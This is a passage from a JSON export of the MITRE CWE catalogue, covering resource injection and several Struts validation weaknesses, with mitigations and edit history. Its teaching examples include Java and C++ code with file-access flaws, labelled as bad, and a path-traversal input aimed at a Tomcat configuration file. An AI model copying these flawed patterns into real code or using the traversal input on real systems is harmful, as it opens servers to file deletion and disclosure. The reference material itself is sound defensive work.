Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, it can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following Java code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as \\"../../tomcat/conf/server.xml\\", which causes the application to delete one of its own configuration files.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String rName = request.getParameter(\\"reportName\\");File rFile = new File(\\"/usr/local/apfr/reports/\\" + rName);...rFile.delete();","xhtml:br":["","",""]}}},{"Intro_Text":"The following code uses input from the command line to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can create soft links to the file, they can use the program to read the first part of any file on the system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"ifstream ifs(argv[0]);string s;ifs &gt;&gt; s;cout &lt;&lt; s;","xhtml:br":["","",""]}},"Body_Text":"The kind of resource the data affects indicates the kind of content that may be dangerous. For example, data containing special characters like period, slash, and backslash, are risky when used in methods that interact with the file system. (Resource injection, when it is related to file system resources, sometimes goes by the name \\"path manipulation.\\") Similarly, data that contains URLs and URIs is risky for functions that create remote connections."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Resource Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-99"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"240"}},{"attr":{"@_CAPEC_ID":"75"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-99"}}]},"Notes":{"Note":[{"#text":"Resource injection that involves resources stored on the filesystem goes by the name path manipulation (CWE-73).","attr":{"@_Type":"Relationship"}},{"#text":"The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 \\"Resource Injection,\\" as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the \\"identifier used to access a system resource\\" such as a file name or port number, yet it explicitly states that the \\"resource injection\\" term does not apply to \\"path manipulation,\\" which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Maintenance_Notes, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Alternate_Terms, Description, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Other_Notes, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Resource Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Control of Resource Identifiers (aka \'Resource Injection\')","attr":{"@_Date":"2009-05-27"}}]}},"102":{"attr":{"@_ID":"102","@_Name":"Struts: Duplicate Validation Forms","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application uses multiple validation forms with the same name, which might cause the Struts Validator to validate a form that the programmer does not expect.","Extended_Description":"If two validation forms have the same name, the Struts Validator arbitrarily chooses one of the forms to use for input validation and discards the other. This decision might not correspond to the programmer\'s expectations, possibly leading to resultant weaknesses. Moreover, it indicates that the validation logic is not up-to-date, and can indicate that other, more subtle validation errors are present.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"694","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"The DTD or schema validation will not catch the duplicate occurrence of the same form name. To find the issue in the implementation, manual checks or automated static analysis could be applied to the xml configuration files."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Two validation forms with the same name.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;form-validation&gt;&lt;/form-validation&gt;","xhtml:div":{"#text":"&lt;formset&gt;&lt;/formset&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;form name=\\"ProjectForm\\"&gt; ... &lt;/form&gt;&lt;form name=\\"ProjectForm\\"&gt; ... &lt;/form&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},"Body_Text":"It is critically important that validation logic be maintained and kept in sync with the rest of the application."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Duplicate Validation Forms"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Background_Details, Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Background_Details, Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"103":{"attr":{"@_ID":"103","@_Name":"Struts: Incomplete validate() Method Definition","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application has a validator form that either does not define a validate() method, or defines a validate() method but does not call super.validate().","Extended_Description":"If the code does not call super.validate(), the Validation Framework cannot check the contents of the form against a validation form. In other words, the validation framework will be disabled for the given form.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The Struts Validator uses a form\'s validate() method to check the contents of the form properties against the constraints specified in the associated validation form. That means the following classes have a validate() method that is part of the validation framework: ValidatorForm, ValidatorActionForm, DynaValidatorForm, and DynaValidatorActionForm. If the code creates a class that extends one of these classes, and if that class implements custom validation logic by overriding the validate() method, the code must call super.validate() in the validate() implementation."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Other","Note":"Disabling the validation framework for a form exposes the application to numerous types of attacks. Unchecked input is the root cause of vulnerabilities like cross-site scripting, process control, and SQL injection."},{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":"Other","Note":"Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Implement the validate() method and call super.validate() within that method."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and the RegistrationForm bean in the Struts framework will maintain the user data. Tthe RegistrationForm class implements the validate method to validate the user input entered into the form.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"super();","attr":{"@_style":"margin-left:10px;"}},{"#text":"ActionErrors errors = new ActionErrors();if (getName() == null || getName().length() &lt; 1) {}return errors;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"errors.add(\\"name\\", new ActionMessage(\\"error.name.required\\"));","attr":{"@_style":"margin-left:10px;"}}}]},{"#text":"// getter and setter methods for private variables...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}}","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {if (getName() == null || getName().length() &lt; 1) {}return errors;","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"super();","attr":{"@_style":"margin-left:10px;"}},{"#text":"ActionErrors errors = super.validate(mapping, request);if (errors == null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"errors = new ActionErrors();","attr":{"@_style":"margin-left:10px;"}}},{"#text":"errors.add(\\"name\\", new ActionMessage(\\"error.name.required\\"));","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"// getter and setter methods for private variables...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}],"Body_Text":"Although the validate method is implemented in this example the method does not call the validate method of the ValidatorForm parent class with a call super.validate(). Without the call to the parent validator class only the custom validation will be performed and the default validation will not be performed. The following example shows that the validate method of the ValidatorForm class is called within the implementation of the validate method."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Erroneous validate() Method"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":[{"#text":"This could introduce other weaknesses related to missing input validation.","attr":{"@_Type":"Relationship"}},{"#text":"The current description implies a loose composite of two separate weaknesses, so this node might need to be split or converted into a low-level category.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Common_Consequences, Description, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Background_Details, Description"}]}},"104":{"attr":{"@_ID":"104","@_Name":"Struts: Form Bean Does Not Extend Validation Class","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"If a form bean does not extend an ActionForm subclass of the Validator framework, it can expose the application to other weaknesses related to insufficient input validation.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"In order to use the Struts Validator, a form must extend one of the following: ValidatorForm, ValidatorActionForm, DynaValidatorActionForm, and DynaValidatorForm. One of these classes must be extended because the Struts Validator ties in to the application by implementing the validate() method in these classes. Forms derived from the ActionForm and DynaActionForm classes cannot use the Struts Validator."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Other","Note":"Bypassing the validation framework for a form exposes the application to numerous types of attacks. Unchecked input is an important component of vulnerabilities like cross-site scripting, process control, and SQL injection."},{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":"Other","Note":"Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that all forms extend one of the Validation Classes."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user information from a registration webpage for an online business site. The user will enter registration data and through the Struts framework the RegistrationForm bean will maintain the user data.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.action.ActionForm {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}// getter and setter methods for private variables...","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}// getter and setter methods for private variables...","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}}}],"Body_Text":["However, the RegistrationForm class extends the Struts ActionForm class which does not allow the RegistrationForm class to use the Struts validator capabilities. When using the Struts framework to maintain user data in an ActionForm Bean, the class should always extend one of the validator classes, ValidatorForm, ValidatorActionForm, DynaValidatorForm or DynaValidatorActionForm. These validator classes provide default validation and the validate method for custom validation for the Bean object to use for validating input data. The following Java example shows the RegistrationForm class extending the ValidatorForm class and implementing the validate method for validating input data.","Note that the ValidatorForm class itself extends the ActionForm class within the Struts framework API."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Form Bean Does Not Extend Validation Class"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Background_Details"}]}},"105":{"attr":{"@_ID":"105","@_Name":"Struts: Form Field Without Validator","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application has a form field that is not validated by a corresponding validation form, which can introduce other weaknesses related to insufficient input validation.","Extended_Description":"Omitting validation for even a single input field may give attackers the leeway they need to compromise the application. Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Some applications use the same ActionForm for more than one purpose. In situations like this, some fields may go unused under some action mappings."}},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Unexpected State"},{"Scope":"Integrity","Impact":"Bypass Protection Mechanism","Note":"If unused fields are not validated, shared business logic in an action may allow attackers to bypass the validation checks that are performed for other uses of the form."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Validate all form fields. If a field is unused, it is still important to constrain it so that it is empty or undefined."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example the Java class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data in the form fields using the private member variables. The RegistrationForm class uses the Struts validation capability by extending the ValidatorForm class and including the validation for the form fields within the validator XML file, validator.xml.","Example_Code":[{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:div":{"#text":"private String name;private String address;private String city;private String state;private String zipcode;private String phone;private String email;public RegistrationForm() {}...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","","","",""],"xhtml:i":["// private variables for registration form","// getter and setter methods for private variables"],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;form-validation&gt;&lt;/form-validation&gt;","xhtml:div":{"#text":"&lt;formset&gt;&lt;/formset&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;form name=\\"RegistrationForm\\"&gt;&lt;/form&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;field property=\\"name\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"address\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"city\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"state\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"zipcode\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.name\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.address\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.city\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.state\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;[a-zA-Z]{2}&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.zipcode\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;\\\\d{5}&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}],"xhtml:br":["","","",""]}}}}},{"attr":{"@_Nature":"good","@_Language":"XML"},"xhtml:div":{"#text":"&lt;form-validation&gt;&lt;/form-validation&gt;","xhtml:div":{"#text":"&lt;formset&gt;&lt;/formset&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;form name=\\"RegistrationForm\\"&gt;&lt;/form&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;field property=\\"name\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"address\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"city\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"state\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"zipcode\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"phone\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"email\\" depends=\\"required,email\\"&gt;&lt;/field&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"&lt;arg position=\\"0\\" 